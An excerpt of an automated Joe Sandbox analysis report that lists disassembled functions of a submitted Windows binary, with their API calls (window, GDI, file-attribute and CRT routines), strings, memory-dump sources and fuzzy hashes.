                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6ff25013101ee38845925cbda37fc50c26384f5909ee2f4e1398c72ccd7c6478
                                                                                                                                                                                                                                                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ff25013101ee38845925cbda37fc50c26384f5909ee2f4e1398c72ccd7c6478
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                                                                                                                            Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                                                            • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                                                                                                                            Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1744303182-0
                                                                                                                                                                                                                                                            • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                                                            • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                                                                                                                            Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                                                                                                            • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                                                                                                                              • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                                                                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                                                                                                              • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                                                                                                                              • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                                                                                                            • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                                                                                                            • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                            • API String ID: 4163708885-3819984048
                                                                                                                                                                                                                                                            • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                                                            • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                                                                                                                                            Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                            • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                            • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                                                                                                            Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                                                                                                            • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                            • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                                                                                                                            Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                            • API String ID: 1914653954-2746444292
                                                                                                                                                                                                                                                            • Opcode ID: e98e204db0e404bb482f5e57bef0fda0e3681e2d1bff2b49b0b898238e6c0866
                                                                                                                                                                                                                                                            • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e98e204db0e404bb482f5e57bef0fda0e3681e2d1bff2b49b0b898238e6c0866
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                                                                                                                                            Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                                                                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                            • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                            • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                                                                                                            Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                                                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                            • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                            • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                            • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                                                                                                                            Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
